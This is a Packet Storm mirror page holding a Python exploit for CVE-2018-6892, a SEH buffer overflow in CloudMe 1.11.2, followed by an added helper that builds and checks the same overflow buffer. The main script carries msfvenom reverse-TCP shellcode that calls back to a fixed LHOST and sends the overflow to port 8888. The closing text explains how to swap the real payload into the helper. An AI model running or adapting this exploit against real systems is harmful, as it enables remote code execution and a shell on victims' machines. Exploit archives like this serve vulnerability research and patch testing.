CloudMe 1.11.2 SEH Buffer Overflow ≈ Packet Storm – Digitalmunition
Published on August 6th, 2020

import socket

target = "127.0.0.1"

#Written by : lutzenfried (Clement Cruchet)
#Exploiting CloudMe 1.11.2 (Publisher : CloudMe AB)
#Windows x64 10.0.18362 Build 18362
#Buffer Overflow using the SEH overwrite technique (POP POP RET)
#Exploit for CVE-2018-6892

#Technical information used for exploit development
#Register EIP is overwritten with pattern at position 1052 in thread 1676
#SEH register is overwritten with pattern at position 2344 in thread 1676
#Bad characters : \x00\x0A\x0D
#0x61f2ba2e | pop edi, pop ebp, ret | False | False | False | False | False | C:\Users\user1\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll

#All pieces are bytes so the script runs under Python 3 (Python 2 str worked by accident)
buf = b"\x41" * 2344              #filler up to the SEH record at offset 2344
nseh = b"\xEB\x08\x90\x90"        #next-SEH pointer: short JMP +8 over the handler into the NOP sled
seh = b"\x2e\xba\xf2\x61"         #SEH handler: 0x61f2ba2e (pop edi; pop ebp; ret) little-endian
nopsled = b"\x90" * 20            #NOP sled to go into payload

#msfvenom -a x86 -p windows/shell/reverse_tcp LHOST=192.168.0.112 LPORT=4545 -b '\x00\x0A\x0D' -f python
payload = b""
payload += b"\xda\xdb\xbf\x52\xf0\xea\x4a\xd9\x74\x24\xf4\x58\x33"
payload += b"\xc9\xb1\x56\x83\xe8\xfc\x31\x78\x14\x03\x78\x46\x12"
payload += b"\x1f\xb6\x8e\x50\xe0\x47\x4e\x35\x68\xa2\x7f\x75\x0e"
payload += b"\xa6\x2f\x45\x44\xea\xc3\x2e\x08\x1f\x50\x42\x85\x10"
payload += b"\xd1\xe9\xf3\x1f\xe2\x42\xc7\x3e\x60\x99\x14\xe1\x59"
payload += b"\x52\x69\xe0\x9e\x8f\x80\xb0\x77\xdb\x37\x25\xfc\x91"
payload += b"\x8b\xce\x4e\x37\x8c\x33\x06\x36\xbd\xe5\x1d\x61\x1d"
payload += b"\x07\xf2\x19\x14\x1f\x17\x27\xee\x94\xe3\xd3\xf1\x7c"
payload += b"\x3a\x1b\x5d\x41\xf3\xee\x9f\x85\x33\x11\xea\xff\x40"
payload += b"\xac\xed\x3b\x3b\x6a\x7b\xd8\x9b\xf9\xdb\x04\x1a\x2d"
payload += b"\xbd\xcf\x10\x9a\xc9\x88\x34\x1d\x1d\xa3\x40\x96\xa0"
payload += b"\x64\xc1\xec\x86\xa0\x8a\xb7\xa7\xf1\x76\x19\xd7\xe2"
payload += b"\xd9\xc6\x7d\x68\xf7\x13\x0c\x33\x9f\xd0\x3d\xcc\x5f"
payload += b"\x7f\x35\xbf\x6d\x20\xed\x57\xdd\xa9\x2b\xaf\x54\xbd"
payload += b"\xcb\x7f\xde\xae\x35\x80\x1e\xe6\xf1\xd4\x4e\x90\xd0"
payload += b"\x54\x05\x60\xdc\x80\xb3\x6a\x4a\x21\x49\x65\xbf\x5d"
payload += b"\x4f\x79\xae\x5c\xc6\x9f\x80\x0e\x88\x0f\x61\xff\x68"
payload += b"\xe0\x09\x15\x67\xdf\x2a\x16\xa2\x48\xc0\xf9\x1a\x20"
payload += b"\x7d\x63\x07\xba\x1c\x6c\x92\xc6\x1f\xe6\x16\x36\xd1"
payload += b"\x0f\x53\x24\x06\x68\x9b\xb4\xd7\x1d\x9b\xde\xd3\xb7"
payload += b"\xcc\x76\xde\xee\x3a\xd9\x21\xc5\x39\x1e\xdd\x98\x0b"
payload += b"\x54\xe8\x0e\x33\x02\x15\xdf\xb3\xd2\x43\xb5\xb3\xba"
payload += b"\x33\xed\xe0\xdf\x3b\x38\x95\x73\xae\xc3\xcf\x20\x79"
payload += b"\xac\xed\x1f\x4d\x73\x0e\x4a\xcd\x74\xf0\x08\xfa\xdc"
payload += b"\x98\xf2\xba\xdc\x58\x99\x3a\x8d\x30\x56\x14\x22\xf0"
payload += b"\x97\xbf\x6b\x98\x12\x2e\xd9\x39\x22\x7b\xbf\xe7\x23"
payload += b"\x88\x64\x18\x59\xe1\x9b\xd9\x9e\xeb\xff\xda\x9e\x13"
payload += b"\xfe\xe7\x48\x2a\x74\x26\x49\x09\x87\x1d\xec\x38\x02"
payload += b"\x5d\xa2\x3b\x07"

#Memory order is nSEH first, then the SEH handler
run = buf + nseh + seh + nopsled + payload

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 8888))
    s.send(run)
    s.close()
except Exception as e:
    print(e)
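The layout used above (filler, nSEH short jump, SEH handler pointing at a POP POP RET gadget, NOP sled, payload) is generic to SEH overwrites, and the two places where such exploits usually break are a forbidden byte that slipped into the buffer (the gadget address counts too) and a short jump whose rel8 displacement does not land in the sled. The helper below is an added illustration, not part of the original Packet Storm exploit: it builds the same buffer from the advisory's constants (offset 2344, gadget 0x61f2ba2e, bad characters \x00\x0A\x0D), packs the address with struct instead of hand-reversing it, and refuses to emit a buffer that fails either check. The eight int3 bytes standing in for the msfvenom payload are constructed for the example.

```python
import struct

# Values taken from the advisory header above (CloudMe 1.11.2).
SEH_OFFSET = 2344          # offset at which the nSEH record is overwritten
POP_POP_RET = 0x61f2ba2e   # pop edi; pop ebp; ret in Qt5Gui.dll (no SafeSEH)
BAD_CHARS = b"\x00\x0a\x0d"

# Constructed stand-in for the msfvenom payload: eight int3 breakpoints,
# enough to prove under a debugger that the jump lands where intended.
SAMPLE_SHELLCODE = b"\xcc" * 8


def short_jmp(displacement):
    """Encode 'jmp short rel8'. rel8 is counted from the end of the two-byte
    instruction, so a value of 8 skips the 2 padding bytes, the 4-byte
    handler address and the first 2 bytes of the NOP sled."""
    if not -128 <= displacement <= 127:
        raise ValueError("short jmp displacement must fit in a signed byte")
    return b"\xeb" + struct.pack("<b", displacement)


def find_bad_chars(data, bad=BAD_CHARS):
    """Return (offset, byte) for every forbidden byte in data."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def build_seh_buffer(shellcode, seh_offset=SEH_OFFSET, handler=POP_POP_RET,
                     displacement=8, nop_count=20, filler=b"\x41"):
    """Lay out filler | nSEH | SEH | NOP sled | shellcode and sanity-check it.

    Raises ValueError if a forbidden byte appears anywhere in the controlled
    data, including inside the handler address, or if the short jump would
    not land inside the NOP sled.
    """
    nseh = short_jmp(displacement) + b"\x90\x90"   # 4 bytes: jmp + padding
    seh = struct.pack("<I", handler)                # little-endian address
    nops = b"\x90" * nop_count
    buf = filler * seh_offset + nseh + seh + nops + shellcode

    sled_start = seh_offset + len(nseh) + len(seh)
    landing = seh_offset + 2 + displacement         # end of jmp + rel8
    if not sled_start <= landing <= sled_start + nop_count:
        raise ValueError("jmp lands at %d, outside the NOP sled [%d, %d]"
                         % (landing, sled_start, sled_start + nop_count))

    bad = find_bad_chars(buf)
    if bad:
        raise ValueError("forbidden bytes at offsets %s"
                         % ", ".join("%d:0x%02x" % hit for hit in bad))
    return buf


def describe(buf, seh_offset=SEH_OFFSET):
    """Offsets of each region, for comparison against the debugger view."""
    return {
        "nseh": seh_offset,
        "seh": seh_offset + 4,
        "nop_sled": seh_offset + 8,
        "total_length": len(buf),
    }


if __name__ == "__main__":
    request = build_seh_buffer(SAMPLE_SHELLCODE)
    print(describe(request))
    print("nSEH:", request[SEH_OFFSET:SEH_OFFSET + 4].hex())
    print("SEH :", request[SEH_OFFSET + 4:SEH_OFFSET + 8].hex())
```

Swapping in the real msfvenom output for SAMPLE_SHELLCODE and sending the returned buffer to port 8888 reproduces the request the script above builds; the bad-character check is what tells you whether an encoder run or a different gadget address has quietly broken the chain before you spend time in the debugger.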
